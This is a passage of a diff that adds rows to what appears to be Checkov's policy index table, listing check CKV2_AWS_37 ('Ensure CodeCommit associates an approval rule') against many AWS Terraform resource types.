+| 687 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 688 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 689 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 690 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 691 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 692 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 693 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 694 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 695 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 696 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 697 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 698 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 699 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 700 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 701 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 702 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 703 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 704 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 705 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 706 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 707 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 708 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 709 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 710 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 711 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 712 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 713 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 714 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 715 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 716 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 717 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 718 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 719 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 720 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 721 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 722 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 723 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 724 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 725 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 726 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 727 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 728 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 729 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 730 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 
731 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 732 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 733 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 734 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 735 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 736 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 737 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 738 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 739 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 740 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 741 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 742 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 743 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 744 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 745 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 746 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 747 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 748 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 749 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 750 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 751 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 752 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 753 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 754 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 755 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 756 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 757 | CKV2_AWS_37 | resource | 
aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 758 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 759 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 760 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 761 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 762 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 763 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 764 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 765 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 766 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 767 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 768 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 769 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 770 | CKV2_AWS_37 | resource | 
aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 771 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 772 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 773 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 774 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 775 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 776 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 777 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 778 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 779 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 780 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 781 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 782 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 783 | CKV2_AWS_37 | resource | 
aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 784 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 785 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 786 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 787 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 788 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 789 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 790 | 
